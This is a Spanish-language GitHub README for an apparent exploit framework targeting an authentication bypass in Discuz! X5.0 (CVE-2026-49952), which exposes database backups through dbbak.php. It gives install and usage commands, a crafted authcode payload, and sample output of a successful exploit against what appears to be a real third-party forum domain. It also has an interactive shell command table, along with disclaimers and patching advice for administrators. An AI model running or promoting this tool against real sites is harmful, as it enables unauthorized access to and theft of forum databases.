
Discuz! X5.0 Framework de explotación de bypass de autenticación (CVE-2026-49952) - Vulnerabilidad crítica que permite el acceso no autenticado a las copias de seguridad de la base de datos mediante la reutilización de tokens del oráculo de cifrado UC_KEY. CVSS 9.1. Herramienta completa con detección de versiones, ataques con múltiples payloads, shell interactiva y explotación automatizada. Solo para pruebas autorizadas.
⚡ CVE-2026-49952 | CVSS 9.1 (Crítico) | Versión 1.0.0
Una herramienta profesional de pruebas de penetración diseñada para identificar y demostrar la vulnerabilidad crítica de bypass de autenticación en Discuz! X5.0.
AVISO IMPORTANTEEsta herramienta se proporciona únicamente con fines educativos y para pruebas de seguridad autorizadas.NO utilice esta herramienta en sistemas que no le pertenezcan o para los que no tenga permiso explícito de prueba.El acceso no autorizado a sistemas informáticos es ilegal y antético.El autor no asume ninguna responsabilidad por el mal uso o los daños causados por esta herramienta.Al utilizar esta herramienta, usted acepta cumplir con todas las leyes y regulaciones aplicables.
El Framework de Explotación de Bypass de Autenticación de Discuz! X5.0 está diseñado para identificar y demostrar la vulnerabilidad crítica de bypass de autenticación (CVE-2026-49952) en las versiones de Discuz! X5.0 publicadas entre el 20 de marzo de 2026 y el 1 de mayo de 2026.
Esta vulnerabilidad permite a atacantes no autenticados acceder a la funcionalidad de copia de seguridad de la base de datos (dbbak.php) explotando el oráculo de cifrado UC_KEY para reutilizar tokens, lo que podría exponer contenidos sensibles de la base de datos.
🏆 Puntuación CVSS: 9.1 (Crítico)
🔐 Impacto: Bypass de autenticación
📂 Acceso: Archivos de copia de seguridad de la base de datos
⚡ Complejidad: Baja (fácil de explotar)
🎯 Objetivo: Discuz! X5.0 (20260320 - 20260501)
La vulnerabilidad existe en el endpoint dbbak.php, donde el mecanismo de validación de tokens depende del oráculo de cifrado UC_KEY. Al elaborar un payload específico en la solicitud de inicio de sesión (member.php), un atacante puede obtener un token de autenticación válido que puede reutilizarse para acceder a la funcionalidad de copia de seguridad de la base de datos sin la autorización adecuada.
❌ Discuz! X5.0 (20260320 - 20260501) - Vulnerable
✅ Discuz! X5.0 (20260510+) - Corregida
🔍 Detección de versión: Huella digital automática e identificación de la versión de Discuz!.
⚡ Ataque multi-payload: Pruebas en paralelo de múltiples variantes de payload.
🖥️ Shell interactiva: Interfaz de línea de comandos completa para explotación manual.
🚀 Explotación automatizada: Explotación con un clic y configuración mínima.
📊 Guardado de resultados: Exporta los resultados de explotación a archivos con marca de tiempo.
🌐 Soporte de proxy: Configuración de proxy HTTP/HTTPS para el tráfico de red.
🎯 Escaneo con hilos: Número de hilos configurable para optimizar el rendimiento.
🎨 Salida con colores: Salida de terminal profesional con códigos de color.
🔐 Soporte SSL/TLS: Gestiona objetivos tanto HTTP como HTTPS.
🔄 Gestión de sesiones: Mantiene el estado de sesión persistente.
📦 Personalización de payload: Soporte para inyección de payloads personalizados.
🎯 Validación del objetivo: Verifica la instalación de Discuz! antes de la explotación.
Python: Versión 3.7 o superior
Pip: Administrador de paquetes de Python
# Clone the repository
git clone https://github.com/CerberusMrXi/Discuz-X5.0-Authentication-Bypass-Exploit-Framework
cd Discuz-X5.0-Authentication-Bypass-Exploit-Framework
# Install required packages
pip install -r requirements.txt
# Verify installation
python3 exploit.py --help
# Build the Docker image
docker build -t exploit .
# Run the container
docker run -it --rm exploit http://target.com
# Simple exploitation
python3 exploit.py http://target.com
# With output file
python3 exploit.py http://target.com --output results.txt
# Verbose mode for debugging
python3 exploit.py http://target.com --verbose
# With proxy and custom threads
python3 exploit.py https://target.com --proxy http://127.0.0.1:8080 --threads 10
# Custom payload
python3 exploit.py http://target.com --payload "admin|1|0|0"
python3 exploit.py http://discuz.eda.com.my
██████╗ ██╗███████╗██╗ ██╗███████╗███████╗██████╗
██╔══██╗██║██╔════╝██║ ██║╚══███╔╝╚══███╔╝╚════██╗
██║ ██║██║███████╗██║ ██║ ███╔╝ ███╔╝ █████╔╝
██║ ██║██║╚════██║██║ ██║ ███╔╝ ███╔╝ ██╔═══╝
██████╔╝██║███████║╚██████╔╝███████╗███████╗███████╗
╚═════╝ ╚═╝╚══════╝ ╚═════╝ ╚══════╝╚══════╝╚══════╝
Discuz! X5.0 Authentication Bypass Exploit Framework
CVE-2026-49952 | CVSS: 9.1 (Critical )
Author: Sudeepa Wanigarathna | Version: 1.0.0
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
[14:32:15] ► Phase 1: Target Reconnaissance
[14:32:15] ➜ Testing connectivity to http://discuz.eda.com.my
[14:32:16] ➜ Detecting Discuz! version...
[14:32:16] ✔ Discuz! Version: X5.0
[14:32:16] ⚡ Target is running a vulnerable version!
[14:32:16] ► Phase 2: Authcode Acquisition
[14:32:16] ➜ Extracting authcode with payload: admin|1|0|0
[14:32:17] ✔ Authcode: aBcDeFgHiJkLmNoPqRsT...
[14:32:17] ► Phase 3: Exploitation
[14:32:17] ➜ Executing exploit (operation: backup )
[14:32:18] ✔ Exploit successful!
[14:32:18] ✔ Results saved to discuz_exploit_20260724_143218.txt
╔══════════════════════════════════════════════════════════╗
║ EXPLOIT SUCCESSFUL ║
╠══════════════════════════════════════════════════════════╣
║ Target: http://discuz.eda.com.my ║
║ Authcode: aBcDeFgHiJkLmNoPqRsT... ║
║ Status: Database backup accessed ║
║ Data Size: 24567 bytes ║
║ Saved to: discuz_exploit_20260724_143218.txt ║
╚══════════════════════════════════════════════════════════╝
Inicie la shell interactiva para la explotación manual:
python3 discuz_exploit.py http://target.com --interactive
Úsela únicamente en sistemas que le pertenezcan o sobre los que tenga permiso explícito para realizar pruebas.
Obtenga autorización por escrito antes de realizar pruebas.
Siga las prácticas de divulgación responsable.
Reporte las vulnerabilidades a los proveedores de forma adecuada.
Úsela en entornos de laboratorio aislados para el aprendizaje.
Nunca la use contra sistemas de producción sin autorización.
No comparta públicamente los datos explotados.
Nunca la use para actividades ilegales o robo de datos.
No modifique ni elimine datos durante las pruebas.
Nunca explote sin consentimiento.
Para administradores de sistemas:
Actualice de inmediato: Actualice a Discuz! X5.0 (20260510+) o posterior.
Deshabilite el endpoint: Deshabilite temporalmente dbbak.php si no es necesario.
Supervise los registros: Esté atento a accesos sospechosos a member.php y dbbak.php.
Reglas WAF: Implemente reglas de firewall de aplicaciones web (WAF) para bloquear solicitudes maliciosas.
Lista blanca de IPs: Restrinja el acceso al endpoint de copia de seguridad a IPs de confianza.
Error: Failed to connect to target
Solutions:
• Check if target URL is correct
• Verify network connectivity
• Check for firewalls blocking access
• Try with proxy: --proxy http://your_proxy:port
• Ensure target is online and accessible
Error: Authentication failed or invalid authcode
Solutions:
• Ensure the target Discuz! version is vulnerable
• Try different payloads for authcode extraction
• Check for network issues or WAF interference
• Run in verbose mode (--verbose ) for more details
Este proyecto está licenciado bajo la Licencia MIT.
Copyright © 2026 Sudeepa Wanigarathna
Por la presente se otorga permiso, de forma gratuita, a cualquier persona que obtenga una copia de este software y de los archivos de documentación asociados (el "Software"), para tratar con el Software sin restricción, incluidos, sin limitación, los derechos de uso, copia, modificación, fusión, publicación, distribución, sublicencia y/o venta de copias del Software, y para permitir a las personas a quienes se proporcione el Software hacer lo mismo, sujeto a las siguientes condiciones:
El aviso de copyright anterior y este aviso de permiso deberán incluirse en todas las copias o partes sustanciales del Software.
EL SOFTWARE SE PROPORCIONA "TAL CUAL", SIN GARANTÍA DE NINGÚN TIPO, EXPRESA O IMPLÍCITA, INCLUYENDO PERO NO LIMITADO A LAS GARANTÍAS DE COMERCIABILIDAD, IDONEIDAD PARA UN FIN PARTICULAR Y NO INFRACCIÓN. EN NINGÚN CASO LOS AUTORES O TITULARES DE LOS DERECHOS DE AUTOR SERÁN RESPONSABLES DE CUALQUIER RECLAMO, DAÑO U OTRA RESPONSABILIDAD, YA SEA EN UNA ACCIÓN DE CONTRATO, AGRAVIO O DE OTRO MODO, QUE SURJA DE, O EN CONEXIÓN CON, EL SOFTWARE O EL USO U OTRO TIPO DE ACCIONES EN EL SOFTWARE.
Autor: Sudeepa Wanigarathna | GitHub: @CerberusMrXi
⭐ Si esta herramienta le resulta útil, ¡considere darle una estrella!
🔐 Úsela de forma responsable. Sea ético. Siga aprendiendo.
| Atributo | Detalles |
|---|
| Tipo de vulnerabilidad | Bypass de autenticación |
| CVE ID | CVE-2026-49952 |
| Versión CVSS | 3.1 |
| Puntuación CVSS | 9.1 (Crítico) |
| Vector de ataque | Red |
| Complejidad del ataque | Baja |
| Privilegios requeridos | Ninguno |
| Interacción del usuario | Ninguna |
| Impacto de confidencialidad | Alto |
| Impacto de integridad | Alto |
| Impacto de disponibilidad | Alto |
| Madurez del código de explotación | Funcional |
| Nivel de remediación | Corrección oficial disponible |
| Comando | Descripción | Ejemplo |
|---|
help | Muestra todos los comandos disponibles | help |
scan | Detecta la versión de Discuz! y comprueba la vulnerabilidad | scan |
get [payload] | Extrae el authcode (payload personalizado opcional ) | `get admin |
exploit [op] | Ejecuta el exploit (predeterminado: backup) | exploit backup |
save | Guarda los resultados en un archivo | save |
info | Muestra la información de la sesión | info |
clear | Limpia la pantalla de la terminal | clear |
exit / quit | Sale de la shell interactiva | exit |